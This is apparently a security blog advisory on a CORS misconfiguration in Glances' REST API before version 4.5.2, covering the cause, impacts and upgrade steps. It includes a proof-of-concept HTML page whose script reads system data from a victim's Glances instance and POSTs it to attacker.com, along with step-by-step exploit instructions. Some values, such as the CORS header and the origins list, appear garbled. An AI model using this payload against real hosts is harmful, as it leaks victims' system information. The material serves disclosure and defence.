Listen to this Post
The vulnerability stems from Glances’ REST API (endpoints under /api/4/) being started with glances -w -B 0.0.0.0. In vulnerable versions, the server responds to every request with the header Access-Control-Allow-Origin:, meaning any website can read the API’s response. Because authentication is disabled by default, an attacker only needs to lure a victim to a malicious webpage while Glances is running in the background. The webpage issues a `fetch()` call to the API, and the permissive CORS policy allows the browser to forward the entire response – including sensitive system data – to the attacker. Among the leaked fields are the full process list, hostname, OS version, CPU architecture, memory and disk usage, network interfaces, IP addresses, and running services. This information can be exfiltrated without any user interaction beyond visiting the malicious site. The root cause is the combination of `allow_origins=[“”]` and `allow_credentials=True` in the Starlette CORS middleware, which reflects the requesting origin instead of returning a literal wildcard. As a result, any origin can make credentialed cross‑origin requests, bypassing the same‑origin policy. Version 4.5.2 fixes the issue by changing the default of `cors_credentials` to `False` and requiring explicit trusted origins when credentials are enabled.
Platform: Glances Version: Prior 4.5.2 Vulnerability: CORS misconfiguration Severity: High date: 2026-04-21 Prediction: Patched 2026-04-19
What Undercode Say
Start vulnerable Glances instance glances -w -B 0.0.0.0 Check CORS headers manually curl -v http://<victim-ip>:61208/api/4/all | grep -i "access-control-allow-origin"
<!-- Malicious HTML (PoC) -->
<!DOCTYPE html>
<html>
<body>
<script>
fetch("http://<victim-ip>:61208/api/4/all")
.then(r => r.json())
.then(data => {
console.log("Exfiltrated data:", data);
// Send data to attacker's server
fetch("https://attacker.com/steal", { method: "POST", body: JSON.stringify(data) });
});
</script>
</body>
</html>
Exploit
- Start Glances in web mode on the victim’s machine.
- Host the above HTML file on an attacker‑controlled domain.
- Trick the victim into visiting the malicious page.
- The victim’s browser fetches `http://
:61208/api/4/all` and sends the system information to the attacker.
Protection from this CVE
- Upgrade to Glances 4.5.2 or later.
- If upgrade is not possible, manually set `cors_origins` to a list of trusted origins and `cors_credentials = false` in the Glances configuration.
- Run Glances only on trusted networks and avoid exposing the web interface to untrusted origins.
Impact
- Information disclosure: Full system monitoring data, process list, network configuration, and host metadata.
- Reconnaissance: Attackers can fingerprint the host for follow‑up exploits (e.g., privilege escalation, lateral movement).
- No authentication required: Any webpage visited by a victim with Glances running can exfiltrate the data.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

